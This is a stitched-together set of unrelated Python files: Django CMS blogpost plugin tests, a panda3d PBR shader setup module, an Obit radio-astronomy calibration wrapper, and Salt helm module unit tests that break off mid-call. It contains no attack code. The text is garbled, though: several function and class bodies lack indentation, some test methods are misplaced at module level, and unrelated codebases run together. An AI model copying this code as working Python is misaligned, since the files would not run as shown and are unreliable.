        add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
        # Freeze "now" so the publication date rendered on the page is stable.
        with mock.patch(
            "cms.models.pagemodel.now",
            return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
        ):
            blogpost_page.publish("en")
            blogpost_page.publish("fr")
        page.publish("en")
        page.publish("fr")
        # Check the page content in English
        url = page.get_absolute_url(language="en")
        # The blogpost plugin should not be visible on the public page before it is published
        blogpost_page.unpublish("en")
        response = self.client.get(url)
        self.assertNotContains(response, "public title")
        # Republish the plugin
        blogpost_page.publish("en")
        # Now modify the blogpost to have a draft different from the public version
        title_obj = blogpost_page.get_title_obj(language="en")
        title_obj.title = "draft title"
        title_obj.save()
        # Publishing the page again should make the plugin public
        page.publish("en")
        # Check the page content in English
        response = self.client.get(url)
        # The blogpost's name should be present as a link to the cms page
        # And CMS page title should be in title attribute of the link
        self.assertIn(
            ('<a href="/en/public-title/" ' 'class="blogpost-glimpse"'),
            re.sub(" +", " ", str(response.content).replace("\\n", "")),
        )
        # The blogpost's title should be wrapped in a h2
        blogpost.refresh_from_db()
        blogpost_title = blogpost.public_extension.extended_object.get_title()
        self.assertContains(
            response,
            f'<h2 class="blogpost-glimpse__title">{blogpost_title:s}</h2>',
            html=True,
        )
        self.assertNotContains(response, "draft title")
        # Blogpost's cover should be present
        pattern = (
            r'<div class="blogpost-glimpse__media">'
            r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
            r'.*alt=""'
        )
        self.assertIsNotNone(re.search(pattern, str(response.content)))
        # Publication date should be set by first publication
        self.assertContains(
            response,
            '<p class="blogpost-glimpse__date">Nov. 30, 2019</p>',
            html=True,
        )
        # Same checks in French
        url = page.get_absolute_url(language="fr")
        response = self.client.get(url)
        self.assertIn(
            ('<a href="/fr/titre-public/" ' 'class="blogpost-glimpse"'),
            re.sub(" +", " ", str(response.content).replace("\\n", "")),
        )
        # pylint: disable=no-member
        pattern = (
            r'<div class="blogpost-glimpse__media">'
            r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
            r'.*alt=""'
        )
        self.assertIsNotNone(re.search(pattern, str(response.content)))
        # Publication date should be set by first publication
        self.assertContains(
            response,
            '<p class="blogpost-glimpse__date">30 novembre 2019</p>',
            html=True,
        )

    def test_cms_plugins_blogpost_fallback_when_never_published(self):
        """
        The blogpost plugin should render in the fallback language when the blogpost
        page has never been published in the current language.
        """
        # Create a blogpost
        blogpost = BlogPostFactory(
            page_title={"en": "public title", "fr": "titre public"},
            fill_cover={
                "original_filename": "cover.jpg",
                "default_alt_text": "my cover",
            },
        )
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page({"en": "A page", "fr": "Une page"})
        placeholder = page.placeholders.get(slot="maincontent")
        add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
        add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
        # Publish only the French version of the blog post
        with mock.patch(
            "cms.models.pagemodel.now",
            return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
        ):
            blogpost_page.publish("fr")
        # Check the page content in English
        page.publish("en")
        url = page.get_absolute_url(language="en")
        response = self.client.get(url)
        # The english blogpost's name should be present as a link to the cms page
        # But the locale in the url should remain "en"
        self.assertIn(
            ('<a href="/en/titre-public/" class="blogpost-glimpse"'),
            re.sub(" +", " ", str(response.content).replace("\\n", "")),
        )
        # The blogpost's title should be wrapped in a h2
        blogpost.refresh_from_db()
        self.assertContains(
            response,
            '<h2 class="blogpost-glimpse__title">titre public</h2>',
            html=True,
        )
        self.assertNotContains(response, "public title")
        # Blogpost's cover should be present
        pattern = (
            r'<div class="blogpost-glimpse__media">'
            r'<img src="/media/filer_public_thumbnails/filer_public/.*cover\.jpg__300x170'
            r'.*alt=""'
        )
        self.assertIsNotNone(re.search(pattern, str(response.content)))
        # Publication date should be set by first publication
        self.assertContains(
            response, '<p class="blogpost-glimpse__date">Nov. 30, 2019</p>', html=True
        )

    def test_cms_plugins_blogpost_fallback_when_published_unpublished(self):
        """
        The blogpost plugin should not render when the blogpost was voluntarily
        unpublished in the current language.
        """
        # Create a blogpost
        blogpost = BlogPostFactory(
            page_title={"en": "public title", "fr": "titre public"},
            fill_cover={
                "original_filename": "cover.jpg",
                "default_alt_text": "my cover",
            },
        )
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page({"en": "A page", "fr": "Une page"})
        placeholder = page.placeholders.get(slot="maincontent")
        add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
        add_plugin(placeholder, BlogPostPlugin, "fr", **{"page": blogpost_page})
        # Publish only the French version of the blog post
        with mock.patch(
            "cms.models.pagemodel.now",
            return_value=datetime(2019, 11, 30, tzinfo=timezone.utc),
        ):
            blogpost_page.publish("fr")
            blogpost_page.publish("en")
            blogpost_page.unpublish("en")
        # Check the page content in English
        page.publish("en")
        url = page.get_absolute_url(language="en")
        response = self.client.get(url)
        # No glimpse at all: explicit unpublish must not fall back to French.
        self.assertNotContains(response, "glimpse")

    def test_cms_plugins_blogpost_render_on_draft_page(self):
        """
        The blogpost plugin should render its public version on a draft page.
        """
        staff = UserFactory(is_staff=True, is_superuser=True)
        self.client.login(username=staff.username, password="password")
        # Create a BlogPost
        blogpost = BlogPostFactory(page_title="public title", should_publish=True)
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page("A page")
        placeholder = page.placeholders.get(slot="maincontent")
        add_plugin(placeholder, BlogPostPlugin, "en", **{"page": blogpost_page})
        page_url = page.get_absolute_url(language="en")
        url = f"{page_url:s}?edit"
        # The blogpost plugin should still be visible on the draft page
        response = self.client.get(url)
        self.assertContains(response, "public title")
        # Now modify the blogpost to have a draft different from the public version
        title_obj = blogpost_page.get_title_obj(language="en")
        title_obj.title = "draft title"
        title_obj.save()
        # The public version of the blogpost plugin should still be visible
        response = self.client.get(url)
        self.assertNotContains(response, "draft title")
        self.assertContains(response, "public title")
        # Publication date block should be present (the post was published)
        self.assertContains(response, "__date")

    def test_cms_plugins_blogpost_render_template(self):
        """
        The blogpost plugin should render according to variant choice.
        """
        staff = UserFactory(is_staff=True, is_superuser=True)
        self.client.login(username=staff.username, password="password")
        # Create an blogpost
        blogpost = BlogPostFactory(page_title="public title", should_publish=True)
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page("A page")
        placeholder = page.placeholders.get(slot="maincontent")
        # Add blogpost plugin with default template
        add_plugin(placeholder, BlogPostPlugin, "en", page=blogpost_page)
        page_url = page.get_absolute_url(language="en")
        url = f"{page_url:s}?edit"
        # The blogpost-glimpse default variant should be glimpse
        response = self.client.get(url)
        self.assertContains(response, "blogpost-glimpse")
        # Add blogpost plugin with small variant
        add_plugin(
            placeholder, BlogPostPlugin, "en", page=blogpost_page, variant="small"
        )
        # The small variant plugin should render with the small class
        response = self.client.get(url)
        self.assertContains(response, "blogpost-small")

    def test_cms_plugins_blogpost_default_variant(self):
        """
        If the variant is specified on the blogpost plugin and also as variant
        variable in the context of its container, the instance variable should
        be used.
        """
        # Create an blogpost
        blogpost = BlogPostFactory(page_title="public title", should_publish=True)
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page("A page")
        placeholder = page.placeholders.get(slot="maincontent")
        # Add blogpost plugin with default template
        model_instance = add_plugin(
            placeholder, BlogPostPlugin, "en", page=blogpost_page, variant="small"
        )
        # Get generated html
        request = RequestFactory()
        request.current_page = page
        request.path_info = "/en/my-path/"
        request.user = AnonymousUser()
        context = {"current_page": page, "blogpost_variant": "xxl", "request": request}
        renderer = ContentRenderer(request=request)
        html = renderer.render_plugin(model_instance, context)
        # The plugin's own variant wins over the context variable.
        self.assertIn("blogpost-small", html)

    def test_cms_plugins_blogpost_cascade_variant(self):
        """
        If the variant is not specified on the blogpost plugin, it should render
        according to variant variable eventually present in the context of its
        container.
        """
        # Create an blogpost
        blogpost = BlogPostFactory(page_title="public title", should_publish=True)
        blogpost_page = blogpost.extended_object
        # Create a page to add the plugin to
        page = create_i18n_page("A page")
        placeholder = page.placeholders.get(slot="maincontent")
        # Add blogpost plugin with default template
        model_instance = add_plugin(
            placeholder, BlogPostPlugin, "en", page=blogpost_page
        )
        # Get generated html
        request = RequestFactory()
        request.current_page = page
        request.path_info = "/en/my-path/"
        request.user = AnonymousUser()
        context = {"current_page": page, "blogpost_variant": "xxl", "request": request}
        renderer = ContentRenderer(request=request)
        html = renderer.render_plugin(model_instance, context)
        # With no instance variant, the context variable drives the template.
        self.assertIn("blogpost-xxl", html)
|
<reponame>TheCheapestPixels/panda3d-simplepbr
import os
import panda3d.core as p3d
from direct.filter.FilterManager import FilterManager
from .version import __version__
__all__ = [
'init',
]
def _add_shader_defines(shaderstr, defines):
shaderlines = shaderstr.split('\n')
for line in shaderlines:
if '#version' in line:
version_line = line
break
else:
raise RuntimeError('Failed to find GLSL version string')
shaderlines.remove(version_line)
define_lines = [
f'#define {define} {value}'
for define, value in defines.items()
]
return '\n'.join(
[version_line]
+ define_lines
+ ['#line 1']
+ shaderlines
)
def _load_shader_str(shaderpath, defines=None):
    """Read a shader source file located next to this module and return its
    text, optionally injecting '#define' lines via _add_shader_defines()."""
    fullpath = os.path.join(os.path.dirname(__file__), shaderpath)
    with open(fullpath) as shaderfile:
        source = shaderfile.read()

    if defines is None:
        return source
    return _add_shader_defines(source, defines)
def init(*, render_node=None, window=None, camera_node=None, msaa_samples=4, max_lights=8):
    '''Initialize the PBR render pipeline

    :param render_node: The node to attach the shader too, defaults to `base.render` if `None`
    :type render_node: `panda3d.core.NodePath`
    :param window: The window to attach the framebuffer too, defaults to `base.win` if `None`
    :type window: `panda3d.core.GraphicsOutput`
    :param camera_node: The NodePath of the camera to use when rendering the scene, defaults to `base.cam` if `None`
    :type camera_node: `panda3d.core.NodePath`
    :param msaa_samples: Number of MSAA samples requested for the offscreen framebuffer, defaults to 4
    :type msaa_samples: int
    :param max_lights: Value baked into the fragment shader's MAX_LIGHTS define, defaults to 8
    :type max_lights: int
    '''
    # NOTE(review): `base` is assumed to be the global ShowBase instance that
    # panda3d installs in builtins — ShowBase must exist before calling init().
    if render_node is None:
        render_node = base.render

    if window is None:
        window = base.win

    if camera_node is None:
        camera_node = base.cam

    # Do not force power-of-two textures
    p3d.Texture.set_textures_power_2(p3d.ATS_none)

    # PBR shader: MAX_LIGHTS is compiled into the fragment shader source.
    pbr_vert_str = _load_shader_str('simplepbr.vert')
    pbr_frag_str = _load_shader_str('simplepbr.frag', {
        'MAX_LIGHTS': max_lights,
    })
    pbrshader = p3d.Shader.make(
        p3d.Shader.SL_GLSL,
        vertex=pbr_vert_str,
        fragment=pbr_frag_str,
    )
    render_node.set_shader(pbrshader)

    # Tonemapping: render the scene into a 16-bit float offscreen buffer,
    # then run the tonemap post-process shader over the resulting quad.
    manager = FilterManager(window, camera_node)
    fbprops = p3d.FrameBufferProperties()
    fbprops.float_color = True
    fbprops.set_rgba_bits(16, 16, 16, 16)
    fbprops.set_depth_bits(24)
    fbprops.set_multisamples(msaa_samples)
    scene_tex = p3d.Texture()
    scene_tex.set_format(p3d.Texture.F_rgba16)
    scene_tex.set_component_type(p3d.Texture.T_float)
    tonemap_quad = manager.render_scene_into(colortex=scene_tex, fbprops=fbprops)

    post_vert_str = _load_shader_str('post.vert')
    post_frag_str = _load_shader_str('tonemap.frag')
    tonemap_shader = p3d.Shader.make(
        p3d.Shader.SL_GLSL,
        vertex=post_vert_str,
        fragment=post_frag_str,
    )
    tonemap_quad.set_shader(tonemap_shader)
    tonemap_quad.set_shader_input('tex', scene_tex)
|
<gh_stars>1-10
# $Id$
#-----------------------------------------------------------------------
# Copyright (C) 2019
# Associated Universities, Inc. Washington DC, USA.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program; if not, write to the Free
# Software Foundation, Inc., 675 Massachusetts Ave, Cambridge,
# MA 02139, USA.
#
# Correspondence concerning this software should be addressed as follows:
# Internet email: <EMAIL>.
# Postal address: <NAME>
# National Radio Astronomy Observatory
# 520 Edgemont Road
# Charlottesville, VA 22903-2475 USA
#-----------------------------------------------------------------------
# Python interface to ObitSoln2Cal utilities
from __future__ import absolute_import
import Obit, UV, Table, OErr
# SN table smoothing
# Input parameter dictionary for PSoln2Cal (SN table smoothing/application).
# 'structure' documents each control parameter; the remaining keys are the
# default values used when the caller does not override them.
Soln2CalInput={
    'structure':['PSoln2Cal',[('solnVer', 'Input Solution (SN) table version '),
                              ('calIn', 'Input Cal (CL) table version, 0=high, -1=none'),
                              ('calOut', 'Output Calibration table version, 0=>create new'),
                              ('subA', 'Selected subarray (default 1)'),
                              ('interMode','Interpolation mode 2PT, SELF POLY SIMP AMBG CUBE MWF '),
                              ('interParm','interpolation parameters'),
                              ('interNPoly','number of terms in polynomial'),
                              ('maxInter', 'Max. time (day) over which to interpolate.'),
                              ('allPass', 'If true copy unmodified entries as well.'),
                              ('refAnt', 'Ref ant to use. (default 1)')]],
    # defaults
    # NOTE(review): 'interParm' is documented above but has no default entry;
    # PSoln2Cal reads it, so callers must supply it — confirm intended default.
    'solnVer':0,
    'calIn':0,
    'calOut':0,
    'subA':1,
    'interMode':" ",
    'interNPoly':2,
    'maxInter':1.0,
    'allPass':False,
    'refAnt':1}
def PSoln2Cal (inUV, outUV, err, input=Soln2CalInput):
    """ Apply a gain solution to a calibration table

    inUV   = UV data with solution and input calibration
    outUV  = UV data for output calibration table
    err    = Python Obit Error/message stack
    input  = input parameter dictionary

    Input dictionary entries:
    solnVer   = Input Solution (SN) table version
    calIn     = Input Cal (CL) table version, 0=high, -1=none
    calOut    = Output Calibration table version, 0=>create new
    subA      = Selected subarray (default 1)
    interMode = Interpolation mode 2PT, SELF POLY SIMP AMBG CUBE MWF
        "2PT " = linear vector interpolation with no SN smoothing.
        "SELF" = Use only SN solution from same source which is closest in time.
        "POLY" = Fit a polynomial to the SN rates and delays.
                 Use the integral of the rate polynomial for the phases. (NYI)
        "SIMP" = Simple linear phase connection between SN phase
                 entries, assumes phase difference less than 180 degrees.
        "AMBG" = Linear phase connection using rates to resolve phase ambiguities.
        "CUBE" = As AMBG but fit third order polynomial to phases and rates.
        "MWF " = Median window filter of SN table before 2PT interpolation
        "GAUS" = Gaussian smoothing of SN table before 2PT interpolation,
        "BOX " = Boxcar smoothing of SN table before 2PT interpolation,
    interParm  = interpolation parameters, smoothing time (hr)
                 amplitude, phase, delay/rate
    interNPoly = number of terms in polynomial
    allPass    = If true copy unmodified entries as well (default False)
    refAnt     = Ref ant to use. (default 1)
    """
    ################################################################
    # Imported locally: the module header does not import InfoList.
    import InfoList
    # Checks
    if not UV.PIsA(inUV):
        raise TypeError('PSoln2Cal: Bad input UV data')
    if not UV.PIsA(outUV):
        raise TypeError('PSoln2Cal: Bad output UV data')
    # Set control values on the input UV data's InfoList.
    # dim is the Obit InfoList dimensionality array; dim[0] is the length of
    # the value being stored (string length or element count).
    dim = [1, 1, 1, 1, 1]
    inInfo = UV.PGetList(inUV)    # Add control to UV data
    dim[0] = 4    # interMode strings are 4 characters
    InfoList.PAlwaysPutString (inInfo, "interMode", dim, [input["interMode"]])
    dim[0] = 1
    InfoList.PAlwaysPutInt (inInfo, "solnVer", dim, [input["solnVer"]])
    InfoList.PAlwaysPutInt (inInfo, "calIn", dim, [input["calIn"]])
    InfoList.PAlwaysPutInt (inInfo, "calOut", dim, [input["calOut"]])
    InfoList.PAlwaysPutInt (inInfo, "subA", dim, [input["subA"]])
    InfoList.PAlwaysPutInt (inInfo, "interNPoly", dim, [input["interNPoly"]])
    InfoList.PAlwaysPutInt (inInfo, "refAnt", dim, [input["refAnt"]])
    InfoList.PAlwaysPutBool (inInfo, "allPass", dim, [input["allPass"]])
    # 'interParm' has no default in Soln2CalInput; fall back to no smoothing.
    interParm = input.get("interParm", [0.0, 0.0, 0.0, 0.0])
    dim[0] = len(interParm)
    # Bug fix: the float parameters were previously written under the
    # "allPass" key, clobbering the boolean and never setting "interParm".
    InfoList.PAlwaysPutFloat (inInfo, "interParm", dim, interParm)
    # NOTE(review): 'maxInter' is documented but never written to the
    # InfoList here — confirm whether the C code reads it. TODO confirm.
    # Calibrate
    Obit.UVSoln2Cal (inUV, outUV, err)
    if err.isErr:
        OErr.printErrMsg(err, "Error applying SN table to CL table")
    # end PSoln2Cal
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt Libs
import salt.modules.helm as helm
# Import Exception
from salt.exceptions import CommandExecutionError
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.unit import TestCase
class HelmTestCase(TestCase, LoaderModuleMockMixin):
"""
Test cases for salt.modules.helm
"""
    def setup_loader_modules(self):
        """Provide the modules this test case patches into the salt loader."""
        return {helm: {}}
    def test__prepare_cmd(self):
        """With no arguments the command is just the helm binary."""
        self.assertEqual(helm._prepare_cmd(), ("helm",))
    def test__prepare_cmd_binary(self):
        """The binary argument replaces the default 'helm' executable."""
        self.assertEqual(helm._prepare_cmd(binary="binary"), ("binary",))
    def test__prepare_cmd_commands(self):
        """Commands are appended verbatim after the binary."""
        self.assertEqual(
            helm._prepare_cmd(commands=["com1", "com2"]), ("helm", "com1", "com2",)
        )
    def test__prepare_cmd_flags(self):
        """Flags are normalized to a leading '--' whether or not they have one."""
        self.assertEqual(
            helm._prepare_cmd(flags=["flag1", "--flag2"]),
            ("helm", "--flag1", "--flag2",),
        )
    def test__prepare_cmd_kvflags(self):
        """Key/value flags become '--key value' pairs; dict ordering is not
        part of the contract, so both orders are accepted."""
        result_tuple = helm._prepare_cmd(
            kvflags={"kflag1": "vflag1", "--kflag2": "vflag2"}
        )
        tuple_valide_1 = (
            "helm",
            "--kflag1",
            "vflag1",
            "--kflag2",
            "vflag2",
        )
        tuple_valide_2 = (
            "helm",
            "--kflag2",
            "vflag2",
            "--kflag1",
            "vflag1",
        )
        #
        self.assertEqual(
            True, result_tuple == tuple_valide_1 or result_tuple == tuple_valide_2
        )
    def test__exec_cmd(self):
        """_exec_cmd() returns cmd.run_all's result augmented with the command
        string that was executed."""
        cmd_prepare = helm._prepare_cmd()
        cmd_prepare_str = " ".join(cmd_prepare)
        cmd_return = {
            "stdout": "succes",
            "stderr": "",
            "retcode": 0,
        }
        # NOTE: result aliases cmd_return on purpose; update() mutates both, so
        # the mocked return value already carries the 'cmd' key.
        result = cmd_return
        result.update({"cmd": cmd_prepare_str})
        with patch.dict(
            helm.__salt__,
            {  # pylint: disable=no-member
                "cmd.run_all": MagicMock(return_value=cmd_return)
            },
        ):
            self.assertEqual(helm._exec_cmd(), result)
    def test__exec_true_return_valid(self):
        """Retcode 0 maps to True."""
        _exec_cmd_return = {"retcode": 0}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual(True, helm._exec_true_return())
    def test__exec_true_return_not_valid(self):
        """A non-zero retcode maps to the stderr text."""
        _exec_cmd_return = {"retcode": -1, "stderr": "test"}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual("test", helm._exec_true_return())
    def test__exec_string_return_valid(self):
        """Retcode 0 maps to the stdout text."""
        _exec_cmd_return = {"retcode": 0, "stdout": "test"}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual("test", helm._exec_string_return())
    def test__exec_string_return_not_valid(self):
        """A non-zero retcode maps to the stderr text."""
        _exec_cmd_return = {"retcode": -1, "stderr": "test"}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual("test", helm._exec_string_return())
    def test__exec_dict_return_valide(self):
        """Retcode 0 with JSON stdout is decoded into a dict."""
        _exec_cmd_return = {"retcode": 0, "stdout": '{"test": true}'}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual({"test": True}, helm._exec_dict_return())
    def test__exec_dict_return_valide_no_json(self):
        """With a non-json output format the raw stdout string is returned."""
        _exec_cmd_return = {"retcode": 0, "stdout": '{"test": true}'}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual(
                '{"test": true}', helm._exec_dict_return(kvflags={"output": "table"})
            )
    def test__exec_dict_return_not_valid(self):
        """A non-zero retcode maps to the stderr text."""
        _exec_cmd_return = {"retcode": -1, "stderr": "test"}
        with patch(
            "salt.modules.helm._exec_cmd", MagicMock(return_value=_exec_cmd_return)
        ):
            self.assertEqual("test", helm._exec_dict_return())
def test_completion(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.completion("bash"))
self.assertEqual(
[call(commands=["completion", "bash"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_create(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.create("name"))
self.assertEqual(
[call(commands=["create", "name"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
def test_dependency_build(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.dependency_build("chart"))
self.assertEqual(
[
call(
commands=["dependency", "build", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_dependency_list(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.dependency_list("chart"))
self.assertEqual(
[
call(
commands=["dependency", "list", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_dependency_update(self):
magic_mock = MagicMock(return_value=True)
with patch("salt.modules.helm._exec_true_return", magic_mock):
self.assertEqual(True, helm.dependency_update("chart"))
self.assertEqual(
[
call(
commands=["dependency", "update", "chart"],
flags=None,
kvflags=None,
)
],
magic_mock.mock_calls,
)
def test_env(self):
magic_mock = MagicMock(return_value="the_return")
with patch("salt.modules.helm._exec_string_return", magic_mock):
self.assertEqual("the_return", helm.env())
self.assertEqual(
[call(commands=["env"], flags=None, kvflags=None)],
magic_mock.mock_calls,
)
# Each test below follows one pattern: patch the low-level helm executor
# (_exec_string_return / _exec_dict_return / _exec_true_return) with a
# MagicMock, call the public module function, and assert both the
# passed-through return value and the exact command list handed to the
# executor.
def test_get_all(self):
    """`helm.get_all` runs `get all <release>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.get_all("release"))
        self.assertEqual(
            [call(commands=["get", "all", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_get_hooks(self):
    """`helm.get_hooks` runs `get hooks <release>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.get_hooks("release"))
        self.assertEqual(
            [call(commands=["get", "hooks", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_get_manifest(self):
    """`helm.get_manifest` runs `get manifest <release>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.get_manifest("release"))
        self.assertEqual(
            [
                call(
                    commands=["get", "manifest", "release"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_get_notes(self):
    """`helm.get_notes` runs `get notes <release>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.get_notes("release"))
        self.assertEqual(
            [call(commands=["get", "notes", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_get_values(self):
    """`helm.get_values` runs `get values <release>` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.get_values("release"))
        self.assertEqual(
            [call(commands=["get", "values", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_help_(self):
    """`helm.help_` runs `help <command>` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.help_("command"))
        self.assertEqual(
            [call(commands=["help", "command"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_history(self):
    """`helm.history` runs `history <release>` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.history("release"))
        self.assertEqual(
            [call(commands=["history", "release"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_install(self):
    """`helm.install` runs `install <release> <chart>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.install("release", "chart"))
        self.assertEqual(
            [
                call(
                    commands=["install", "release", "chart"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_lint(self):
    """`helm.lint` runs `lint <path>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.lint("path"))
        self.assertEqual(
            [call(commands=["lint", "path"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_list_(self):
    """`helm.list_` runs `list` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.list_())
        self.assertEqual(
            [call(commands=["list"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_package(self):
    """`helm.package` runs `package <chart>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.package("chart"))
        self.assertEqual(
            [call(commands=["package", "chart"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )
# Same delegation pattern as above: mock the executor, call the public
# function, and assert the return value and the exact command list.
def test_plugin_install(self):
    """`helm.plugin_install` runs `plugin install <path>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.plugin_install("path"))
        self.assertEqual(
            [
                call(
                    commands=["plugin", "install", "path"], flags=None, kvflags=None
                )
            ],
            magic_mock.mock_calls,
        )

def test_plugin_list(self):
    """`helm.plugin_list` runs `plugin list` via the string executor."""
    magic_mock = MagicMock(return_value="the_return")
    with patch("salt.modules.helm._exec_string_return", magic_mock):
        self.assertEqual("the_return", helm.plugin_list())
        self.assertEqual(
            [call(commands=["plugin", "list"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_plugin_uninstall(self):
    """`helm.plugin_uninstall` runs `plugin uninstall <plugin>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.plugin_uninstall("plugin"))
        self.assertEqual(
            [
                call(
                    commands=["plugin", "uninstall", "plugin"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_plugin_update(self):
    """`helm.plugin_update` runs `plugin update <plugin>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.plugin_update("plugin"))
        self.assertEqual(
            [
                call(
                    commands=["plugin", "update", "plugin"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_pull(self):
    """`helm.pull` runs `pull <pkg>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.pull("pkg"))
        self.assertEqual(
            [call(commands=["pull", "pkg"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
        )

def test_repo_add(self):
    """`helm.repo_add` runs `repo add <name> <url>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.repo_add("name", "url"))
        self.assertEqual(
            [
                call(
                    commands=["repo", "add", "name", "url"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_repo_index(self):
    """`helm.repo_index` runs `repo index <directory>` via the boolean executor."""
    magic_mock = MagicMock(return_value=True)
    with patch("salt.modules.helm._exec_true_return", magic_mock):
        self.assertEqual(True, helm.repo_index("directory"))
        self.assertEqual(
            [
                call(
                    commands=["repo", "index", "directory"],
                    flags=None,
                    kvflags=None,
                )
            ],
            magic_mock.mock_calls,
        )

def test_repo_list(self):
    """`helm.repo_list` runs `repo list` via the dict executor."""
    magic_mock = MagicMock(return_value={"test": True})
    with patch("salt.modules.helm._exec_dict_return", magic_mock):
        self.assertEqual({"test": True}, helm.repo_list())
        self.assertEqual(
            [call(commands=["repo", "list"], flags=None, kvflags=None)],
            magic_mock.mock_calls,
